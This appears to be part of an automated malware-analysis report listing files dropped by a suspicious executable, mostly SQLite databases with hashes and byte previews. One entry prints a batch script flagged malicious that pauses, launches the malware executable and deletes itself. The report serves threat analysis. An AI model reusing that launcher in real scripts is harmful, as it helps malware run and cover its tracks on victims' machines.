                                                                                  SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                  SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8746135976761988
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                  MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                  SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                  SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                  SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\Providerbroker.exe
                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):180
                                                                                  Entropy (8bit):5.2974817565206545
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7xkrVJvDENHovBktKcKZG1Ukh4E2J5xAIK5ehq:hCRLuVFOOr+DEdEj7ENHovKOZG1923f6
                                                                                  MD5:F0173C89340BB04EDE0941BE47F54052
                                                                                  SHA1:64CB1EED6A19054E20266B1E86CD336E1B55532B
                                                                                  SHA-256:61107B98A7CD312BB04BAED904592AD201D2BB0E5F92B22473A5E0C751F9A8CA
                                                                                  SHA-512:D5BC91936F89E9E27E1F7A97B85763F71E8A602A7A892103F168C762A7E52909B543DD2E5CDA0F319906257284AE5EB5A19B4DE0CB56C6C7964EC5EB4076B0BF
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Ze4zcGVeMm.bat"
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.121297215059106
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136413900497188
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
